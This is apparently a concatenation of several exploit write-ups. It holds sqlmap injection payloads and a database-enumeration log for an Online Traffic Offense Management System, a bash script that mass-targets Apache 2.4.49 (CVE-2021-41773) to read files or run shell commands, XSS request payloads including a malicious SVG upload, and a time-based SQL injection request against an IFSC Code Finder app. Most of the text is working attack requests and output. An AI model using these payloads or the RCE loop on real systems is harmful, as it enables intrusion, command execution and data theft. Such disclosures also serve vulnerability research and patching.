-----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652' AND (SELECT 4940 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(4940=4940,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zvbh'='zvbh -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652' AND (SELECT 7241 FROM (SELECT(SLEEP(5)))rEqK) AND 'CONm'='CONm -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Parameter: MULTIPART #5* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3' AND 4015=4015 AND 'mPLR'='mPLR -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3' AND (SELECT 6830 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(6830=6830,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pbeA'='pbeA -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3' AND (SELECT 5446 FROM (SELECT(SLEEP(5)))QMKi) AND 'GfhC'='GfhC -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Parameter: MULTIPART #6* ((custom) POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001' RLIKE (SELECT (CASE WHEN (7186=7186) THEN '' ELSE 0x28 END)) AND 'rwJI'='rwJI -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001' AND (SELECT 2971 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(2971=2971,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OeqR'='OeqR -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001' AND (SELECT 5527 FROM (SELECT(SLEEP(5)))GfWJ) AND 'GtGB'='GtGB -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Parameter: MULTIPART #2* ((custom) POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1' RLIKE (SELECT (CASE WHEN (8485=8485) THEN '' ELSE 0x28 END)) AND 'CyNe'='CyNe -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1' AND (SELECT 6653 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(6653=6653,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'tCsu'='tCsu -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1' AND (SELECT 6178 FROM (SELECT(SLEEP(5)))CQxQ) AND 'MljD'='MljD -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Parameter: MULTIPART #3* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1' AND 5855=5855 AND 'broT'='broT -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1' AND (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7162626b71,(SELECT (ELT(9644=9644,1))),0x7162717a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'zaBh'='zaBh -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="date_created" 2021-08-18T15:00 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="ticket_no" 12345678 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="driver_id" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_id" OFC-789456123 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="officer_name" George -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="status" 1 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 1' AND (SELECT 4422 FROM (SELECT(SLEEP(5)))wQes) AND 'GuRX'='GuRX -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 652 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="offense_id[]" 3 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="fine[]" 1001 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="total_amount" 1651 -----------------------------7900788429998101281579901385 Content-Disposition: form-data; name="remarks" Sample -----------------------------7900788429998101281579901385-- [...] # Dump user, used database, all databases on the server using sqlmap C:\Users\Hubert\Desktop\sqlmapproject-sqlmap-24e3b6a>sqlmap.py --level=5 --risk=3 -r C:\Users\Hubert\Desktop\0day\sql2 --dbms=MySQL --current-user --current-db --dbs --batch [...] [06:06:23] [INFO] testing MySQL [06:06:23] [INFO] confirming MySQL [06:06:24] [WARNING] reflective value(s) found and filtering out [06:06:24] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.48, PHP 7.4.23 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [06:06:24] [INFO] fetching current user [06:06:24] [INFO] resumed: 'root@localhost' current user: 'root@localhost' [06:06:24] [INFO] fetching current database [06:06:24] [INFO] retrieved: 'traffic_offense_db' current database: 'traffic_offense_db' [06:06:24] [INFO] fetching database names [06:06:24] [INFO] retrieved: 'information_schema' [06:06:24] [INFO] retrieved: 'mysql' [06:06:24] [INFO] retrieved: 'performance_schema' [06:06:24] [INFO] retrieved: 'phpmyadmin' [06:06:24] [INFO] retrieved: 'test' [06:06:24] [INFO] retrieved: 'test2' [06:06:24] [INFO] retrieved: 'traffic_offense_db' available databases [7]: [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test [*] test2 [*] traffic_offense_db [06:06:24] [INFO] fetched data logged to text files under 'C:\Users\Hubert\AppData\Local\sqlmap\output\localhost' [*] ending @ 06:06:24 /2021-10-07/
  11. HireHackking

    Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) # Date: 10/05/2021 # Exploit Author: Lucas Souza https://lsass.io # Vendor Homepage: https://apache.org/ # Version: 2.4.49 # Tested on: 2.4.49 # CVE : CVE-2021-41773 # Credits: Ash Daulton and the cPanel Security Team #!/bin/bash if [[ $1 == '' ]]; [[ $2 == '' ]]; then echo Set [TAGET-LIST.TXT] [PATH] [COMMAND] echo ./PoC.sh targets.txt /etc/passwd exit fi for host in $(cat $1); do echo $host curl -s --path-as-is -d "echo Content-Type: text/plain; echo; $3" "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e$2"; done # PoC.sh targets.txt /etc/passwd # PoC.sh targets.txt /bin/sh whoami
  12. HireHackking

    Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated) # Date: 07/10/2021 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html # Version: 1.0 # Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### XSS Stored and XSS Reflected # All requests can be sent by both an authenticated and a non-authenticated user # XSS Stored - example vulnerable pages and parameters: * The entire application is susceptible to Stored XSS vulnerabilities, below are examples of pages and parameters * We can upload SVG file from XSS to all places in webapp * We can add evil code from admin account, regular user account and unauthenticated - we needs only request * http://localhost/traffic_offense/admin/?page=user Parameters: - firstname - lastname - user image - svg file with javascript code - XSS * http://localhost/traffic_offense/classes/Master.php?f=save_offense_record Parameters: - date_created - ticket_no - officer_id - officer_name - status - remarks - SVG file with javascript code - XSS * All application is vulnerable # XSS Reflected - example vulnerable pages and parameters: * http://localhost/traffic_offense/admin/?page Parameters: - page * http://localhost/traffic_offense/classes/Login.php Parameters: - username - password * http://localhost/traffic_offense/*/&id=1 [all pages where the id parameter is present] Parameters: - id * http://localhost/traffic_offense/classes/Master.php Parameters: - id * http://localhost/traffic_offense/classes/Users.php Parameters: - id ----------------------------------------------------------------------------------------------------------------------- # POC ----------------------------------------------------------------------------------------------------------------------- ## Example 1 - XSS Reflected # Request using POST method, payload is in the parameter value id POST /traffic_offense/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------21986352462593413643786432583 Content-Length: 1061 Origin: http://localhost Connection: close Referer: http://localhost/traffic_offense/admin/?page=user Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------21986352462593413643786432583 Content-Disposition: form-data; name="id" 13<script>alert(1)</script>37 -----------------------------21986352462593413643786432583 Content-Disposition: form-data; name="firstname" hacked [...] ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 01:05:26 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 186 Connection: close Content-Type: text/html; charset=UTF-8 UPDATE users set firstname = 'sdasfd' , lastname = 'fdxfd' , username = 'test2' , `password` = 'ad0234829205b9033196ba818f7a872b' where id = 13<script>alert(1)</script>37 ----------------------------------------------------------------------------------------------------------------------- # Request using GET method, payload is in the parameter value id GET /traffic_offense/admin/offenses/view_details.php?id=13<script>alert(1)</script>37' HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 05:28:35 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 7893 Connection: close Content-Type: text/html; charset=UTF-8 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''13<script>alert(1)</script>37''' at line 1 SELECT r.*,d.license_id_no, d.name as driver from `offense_list` r inner join `drivers_list` on r.driver_id = d.id where r.id = '13<script>alert(1)</script>37'' <br /> [...] ----------------------------------------------------------------------------------------------------------------------- ## Example 2 # XSS Stored # Save JS payload in user profile and add SVG file from vuln script POST /traffic_offense/classes/Users.php?f=save HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------85748650716762987124528102 Content-Length: 4304 Origin: http://localhost Connection: close Referer: http://localhost/traffic_offense/admin/?page=user Cookie: PHPSESSID=vt0b3an93oqfgacv02oqnvmb0o Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------85748650716762987124528102 Content-Disposition: form-data; name="id" 1 -----------------------------85748650716762987124528102 Content-Disposition: form-data; name="firstname" admin"/><img src=x onmouseover=alert(1)> -----------------------------85748650716762987124528102 Content-Disposition: form-data; name="lastname" admin"/><img src=x onmouseover=alert(1)> -----------------------------85748650716762987124528102 Content-Disposition: form-data; name="username" admin -----------------------------85748650716762987124528102 Content-Disposition: form-data; name="password" admnin123 -----------------------------85748650716762987124528102 Content-Disposition: form-data; name="img"; filename="xss.svg" Content-Type: image/svg+xml [...]SVG PAYLOAD[...] ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 05:31:29 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 1 ----------------------------------------------------------------------------------------------------------------------- # Request download new user data GET /traffic_offense/admin/?page=user/manage_user&id=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close ----------------------------------------------------------------------------------------------------------------------- # Response HTTP/1.1 200 OK Date: Thu, 07 Oct 2021 05:42:04 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 X-Powered-By: PHP/7.4.23 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 24719 [...] <div class="form-group col-6"> <label for="name">First Name</label> <input type="text" name="firstname" id="firstname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required> </div> <div class="form-group col-6"> <label for="name">Last Name</label> <input type="text" name="lastname" id="lastname" class="form-control" value="admin"/><img src=x onmouseover=alert(1)>" required> </div> [...] <div class="form-group col-6 d-flex justify-content-center"> <img src="http://localhost/traffic_offense/uploads/1633584660_xss.svg" alt="" id="cimg" class="img-fluid img-thumbnail"> </div> [...]
  13. HireHackking

    IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Title: IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated) # Exploit Author: Yash Mahajan # Date: 2021-10-07 # Vendor Homepage: https://phpgurukul.com/ifsc-code-finder-project-using-php/ # Version: 1 # Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=14478 # Tested On: Windows 10, XAMPP # Vulnerable Parameter: searchifsccode Steps to Reproduce: 1) Navigate to http://127.0.0.1/ifscfinder/ enter any number in search field and capture request in burpsuite. 2) Paste below request into burp repeater and also create a txt file and paste this request. Request: ======== POST /ifscfinder/search.php HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 79 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/ifscfinder/ Cookie: PHPSESSID=5877lg2kv4vm0n5sb8e1eb0d0k Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 searchifsccode=')+AND+(SELECT+3757+FROM+(SELECT(SLEEP(20)))lygy)--+fvnT&search= -------------------------------------------------------------------------------- 3) You will see a time delay 